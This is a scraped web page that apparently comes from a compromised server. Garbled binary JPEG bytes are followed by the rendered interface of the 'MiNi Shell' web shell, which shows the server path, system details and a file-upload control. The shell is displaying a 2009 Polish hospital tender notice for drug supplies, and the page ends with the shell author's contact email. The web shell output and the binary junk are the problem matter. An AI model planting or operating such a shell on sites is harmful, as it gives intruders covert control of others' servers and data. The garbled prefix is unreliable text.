JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090310/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090310/55896-N-2009.html

<p class="kh_header"><b>Kamienna Góra: dostawa leków</b><br>
<b>Numer ogłoszenia: 55896 - 2009; data zamieszczenia: 10.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Zdrowia w Kamiennej Górze Sp. z o.o. Niepubliczny Zakład Opieki Zdrowotnej Szpital Powiatowy , ul. Bohaterów Getta 10, 58-400 Kamienna Góra, woj. dolnośląskie, tel. 075 7449033.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcz.org.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Niepubliczny Zakład Opieki Zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa leków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Powiatowe  Centrum Zdrowia w Kamiennej Górze  sp zoo Niepubliczny Zakład Opieki Zdrowotnej Szpital Powiatowy pragnie zaprosić Państwa firmę do udziału w postępowaniu prowadzonym w trybie przetargu nieograniczonego nr 5-2009 na dostawę  leków i produktów leczniczych  dla Naszej jednostki zgodnie z kodem CPV: 24.41.60.00-3.
 Zamawiający   dopuszcza składanie ofert  częściowych, gdyż przedmiot zamówienia jest podzielny i składa się  z  165  pakietów z czego:
-       89  pozycji leków 
 7  pozycji żywieniowych
14 pozycje inne
23 pozycji substancji recepturowych 
 14  pozycji materiałów pomocniczych 
 18 pozycji insulin  
Przewidywane zużycie wyżej wymienionego asortymentu jest zamieszczone w formularzu cenowym będącym załącznikiem nr g  do niniejszej specyfikacji istotnych warunków zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6, 33.68.00.00-0, 33.69.20.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 165.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie wymaga sie wpłaty wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> a)nie podlegają wykluczeniu na podstawie art. 24   ust. 1 pkt. 1 - 10 oraz ust. 2 pkt. 1 - 4 oraz spełniają warunki określone w art. 22 ust.1 pkt. 1 - 4  ustawy;
b)spełnią  warunki podstawowe przedmiotu zamówienia określone w  rozdziale   I, II  i III  (oferowane towary winny posiadać parametry podane w   zał nr g)   oraz  inne wymogi określone w siwz w tym również  projektu umowy;
c)dostarczy ofertę sporządzoną wg siwz wraz z wypełnionymi następującymi formularzami określonymi w rozdziale III;
d)posiadają koncesję, zezwolenie lub licencję, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem publicznym; 
e)przedstawią dokument potwierdzający, że oferowany towar  posiada wszelkie, aktualne wymagane przepisami prawa dokumenty dopuszczające do  stosowania w placówkach służby zdrowia;
f)posiadają   doświadczenie z ostatnich 3  lat, a jeżeli okres prowadzenia działalności jest krótszy z tego okresu wyrażające się tym, że jako wykonawca   brał udział  w co najmniej 2 dostawach (odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia  z  podaniem ich wartości, przedmiotu, dat wykonania i odbiorców) wykonanych (zakończonych) lub wykonywanych  wraz z dokumentami (referencjami), z których wynikać musi, że dostawy te zostały wykonane lub są wykonywane należycie; 
g)termin realizacji dostawy towaru: 48 godzin;
h)zapewni minimalny termin płatności: 30 dni od daty wystawienia  faktury vat;
i)dostawa towaru będzie się odbywać na koszt i ryzyko transportem dostawcy. 
j)zapewni stałość cen netto przez okres trwania umowy - 6  m-cy z wyjątkiem zmiany stawki podatku Vat.


Warunki te będą spełnione przez Wykonawcę, jeżeli potwierdzą je dokumenty, o których mowa w rozdziale III.
Ocena powyższych  warunków wymaganych od oferentów zostanie dokonana na podstawie złożonych wraz z ofertą oświadczeń, dokumentów i wykazów, o których mowa w rozdziale III wg formuły:  spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem oferenta z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków udziału w postępowaniu Wykonawcy ubiegający się o uzyskanie zamówienia dostarczą zgodnie z   poniższym wykazem wypełnione  oświadczenia i dokumenty (które należy zaparafować i przedstawić w formie załączników do oferty, stanowiących integralną jej część):

1 formularze: 
 

1.1 formularz ofertowy zał nr a
1.2 oświadczenie oferenta zał nr b
1.3 oświadczenie w sprawie stosowania się do siwz zał nr c
1.4 formularz upoważnienia do podpisania oferty zał nr d**
1.5 oświadczenie oferenta o spełnianiu warunków udziału w postępowaniu nr j 
1.6 oferta   zał nr e
1.7 projekt umowy zał nr f  
1.8 formularz cenowy  zał nr g*
1.9 podwykonawcy zał nr h

2.Zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane w postępowaniu o zamówienie publiczne -  w celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy - zgodnie z § 1 ust. 1 w/w RRM Zamawiający żąda następujących dokumentów (w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę):
-       aktualnego odpisu z właściwego  rejestru albo aktualnego zaświadczenia o  wpisie do  ewidencji działalności  gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia  do ewidencji    działalności gospodarczej, wystawionego nie wcześniej niż  6 miesięcy przed upływem terminu  składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - zał nr 1;
-       aktualnych   zaświadczeń  właściwego naczelnika urzędu  skarbowego oraz właściwego oddziału  Zakładu Ubezpieczeń  Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, potwierdzających odpowiednio, że wykonawca   nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i  społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie  na raty zaległych płatności lub wstrzymanie w całości  wykonania decyzji właściwego  organu, wystawionych nie wcześniej niż   3 miesiące przed upływem terminu składania  ofert - zał nr 2;
-       aktualnej  informacji z Krajowego  Rejestru Karnego  w zakresie określonym w art. 24 ust. 1 pkt. 4 - 8 ustawy, wystawionej  nie wcześniej niż  6 miesięcy przed upływem terminu  składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia publicznego albo składania ofert   -  zał  nr 3;
aktualnej  informacji z Krajowego  Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy, wystawionej nie wcześniej niż  6 miesięcy przed upływem terminu  składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia publicznego albo składania ofert - zał  nr 4;
koncesji, zezwolenia lub licencji, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjecie działalności gospodarczej w zakresie objętym zamówieniem publicznym, zwanym dalej zamówieniem - zał nr 5 (W przypadku, gdy ustawy nie nakładają obowiązku posiadania koncesji, zezwolenia ani licencji Zamawiający uzna przedstawienie stosownego oświadczenia za wyczerpujące spełnienie zapisów tej kwestii);
w przypadku wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium RP Zamawiający wymaga złożenia dokumentów  o których mowa w  § 2 ust. 1, 2, 3 RPRM z dn. 19 maja 2006r. na zasadach określonych danymi przepisami - zał nr 6.
2.1Zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane w postępowaniu o zamówienie publiczne - w celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia - zgodnie z § 1 ust. 2 w/w RRM,  Zamawiający żąda następujących dokumentów (w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę):
-      wykazu wykonanych dostaw  w okresie ostatnich trzech lat przed dniem wszczęcia postępowania  o udzielenie zamówienia,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu,  dat wykonania i odbiorców   oraz załączenia dokumentów potwierdzających, że dostawy  te zostały wykonane należycie - zał nr  A  - wykazu dostaw (Dla Zamawiającego wystarczającym jest udokumentowanie co najmniej  2 dostaw  odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia,  z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców  wykonanych/zakończonych lub wykonywanych  z ostatnich trzech lat  wraz z dokumentami (referencjami), z których wynikać musi, że dostawy te zostały wykonane lub są wykonywane należycie. Załączenie w ofercie więcej niż 2  udokumentowanych dostaw  nie wpłynie na ocenę oferty);  
3. Zgodnie z art. 9 ust. 4 ustawy z dnia 30 sierpnia 1991r. o zakładach opieki zdrowotnej Dz. U. z 1991r. Nr 91, poz. 408, z późniejszymi zmianami, na mocy której zakłady opieki zdrowotnej nabywają i stosują wyroby medyczne  - odpowiadające wymaganiom ustawy z dnia 20 kwietnia  2004r. o wyrobach medycznych (Dz. U. Nr 93, poz. 896)  oraz Rozporządzeniem Ministra Zdrowia z dnia 30 kwietnia 2004r. w sprawie klasyfikacji wyrobów medycznych do różnego przeznaczenia (Dz. U. z dnia 1 maja 2004r.) w celu potwierdzenia bezpieczeństwa i jakości oferowanych wyrobów Zamawiający   wymaga złożenia w ofercie dokumentów potwierdzających powyższy wymóg.   
         W tym celu Wykonawca winien pisemnie potwierdzić, czy oferowany przez niego towar  w danym przetargu jest  wyrobem medycznym, a jeśli tak, to należy  załączyć do oferty dokumenty potwierdzające dopuszczenie wyrobu medycznego do obrotu na terytorium  RP w formie oryginału lub kserokopii  potwierdzonych  za zgodność z oryginałem przez Wykonawcę tj.:
deklaracja zgodności z wymogami zasadniczymi wystawiona przez producenta (dotyczy wszystkich klas wyrobów medycznych);
certyfikat CE j. Notyfikowanej (dotyczy klas wyrobów medycznych: I sterylna, I z funkcją pomiarową, II a, II b, III);
wpis/zgłoszenie do Rejestru Wyrobów Medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i używania (nie dotyczy klasy wyrobu medycznego I i II a pod warunkiem, że jego pierwsze wprowadzenie do obrotu nastąpiło w innym niż Polska kraju Unii Europejskiej, zgodnie z przepisami ustawy z dnia 20.04.2004 r. o wyrobach medycznych)
      lub   złożyć   oświadczenie, iż oferowany towar  posiada dopuszczenie do obrotu zgodnie z ustawą z dnia 20.04.2004r. o wyrobach medycznych, oraz zobowiązanie Wykonawcy do przedstawienia tych dokumentów na każde wezwanie Zamawiającego   - jako zał B.

4. W przypadku  leków, płynów infuzyjnych i substancji recepturowych Zamawiający wymaga dołączenia do oferty odpowiednich świadectw  wydanych  przez Urząd Rejestracji Produktów Leczniczych Wyrobów Medycznych i Produktów Biobójczych lub  oświadczeń o posiadaniu stosownych dopuszczeń do obrotu   oraz zobowiązanie Wykonawcy do przedstawienia tych dokumentów na każde wezwanie Zamawiającego- oświadczenie  należy dołączyć do oferty  w formie załącznika - zał   nr C. 

 *     Formularz cenowy należy dołączyć również w wersji  elektronicznej wraz z oświadczeniem, iż wersja ta odpowiada wersji  papierowej przedstawionej w ofercie oraz jest zgodna  w każdym szczególe.
  PROSIMY   O NIE USUWANIE WIERSZY, TAM GDZIE PAŃSTWO NIE SKŁADACIE OFERTY. FORMULARZ WINIEN BYĆ WYPEŁNIONY  CHRONOLOGICZNIE    A POLA KTÓRE NIE DOTYCZĄ NIE WYPEŁNIANE - CO USPRAWNI PRACĘ  ZAMAWIAJĄCEGO !   ZAŁĄCZNIKI B I C SPORZĄDZA SAM WYKONAWCA !
**   Załącznik wypełnić w  przypadku gdy oferta będzie podpisywana przez pełnomocnika  (nie wyszczególniony w aktualnym KRS lub wpisie do  
      ewidencji działalności gospodarczej), czy jednego z konsorcjantów podmiotu składającego ofertę.
      W  przypadku gdy oferta będzie podpisywana przez upełnomocnionego przedstawiciela firmy wyszczególnionego w aktualnym   KRS   lub  
      aktualnym zaświadczeniu o wpisie do ewidencji działalności gospodarczej dany załącznik nie jest konieczny do wypełnienia i załączenia do oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pcz.org.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> POWIATOWE  CENTRUM ZDROWIA W KAMIENNEJ GÓRZE  sp zoo
NIEPUBLICZNY ZAKŁAD OPIEKI ZDROWOTNEJ SZPITAL POWIATOWY 
58-400 Kamienna Góra 
ul. Bohaterów Getta  10
dział zamówień publiczny.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.03.2009 godzina 10:00, miejsce: SEKRETARIAT
POWIATOWE  CENTRUM ZDROWIA W KAMIENNEJ GÓRZE  sp zoo
NIEPUBLICZNY ZAKŁAD OPIEKI ZDROWOTNEJ SZPITAL POWIATOWY 
58-400 Kamienna Góra 
ul. Bohaterów Getta  10, woj. dolnośląskie.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com